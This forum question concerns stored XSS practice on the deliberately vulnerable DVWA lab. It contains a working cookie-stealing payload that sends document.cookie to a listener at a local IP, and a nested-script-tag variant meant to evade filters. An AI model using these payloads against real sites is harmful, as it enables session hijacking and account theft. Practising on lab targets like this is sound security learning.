# XSS Payload Cookie Stealing

Tags: xss, dvwa

I have been playing around with the DVWA stored XSS page and wondered if someone could help.

I used XSS Validator in Burp and found numerous payloads that give a prompt, indicating that XSS is present.

One of the payloads that was successful is below, so I thought I could just insert my own payload into the javascript part of it and it would work. But it doesn't.

These work as expected:

`<scri<script>pt>prompt(299792458);</scr</script>ipt>` Shows a pop up

`<script>var i=new Image;i.src="http://192.168.0.13:8000/?"+document.cookie;</script>`
Sends the cookie back to my listener

However, when I take my cookie stealing payload (like the below) and insert it into the new one I am trying to get working, it doesn't work. But surely it should? When I say not working, it reaches the page find and stores it, but doesn't give anything back to my listener

`<scri<script>pt>var i=new Image;i.src="http://192.168.0.13:8000/?"+document.cookie;</scr</script>ipt>`

That isn't a typo on `<scri<script>pt>` I was playing around with different payloads to avoid a WAF even though there isn't one present. I wanted to see if I can use different payloads to capture the cookie back to my listener. It is all running on the same local host so no network issues.

Any ideas?

Comment: The `<scri<script>pt>` part was a typo when adding the question on in your code as well?

Comment: Is there any related error in the browser console?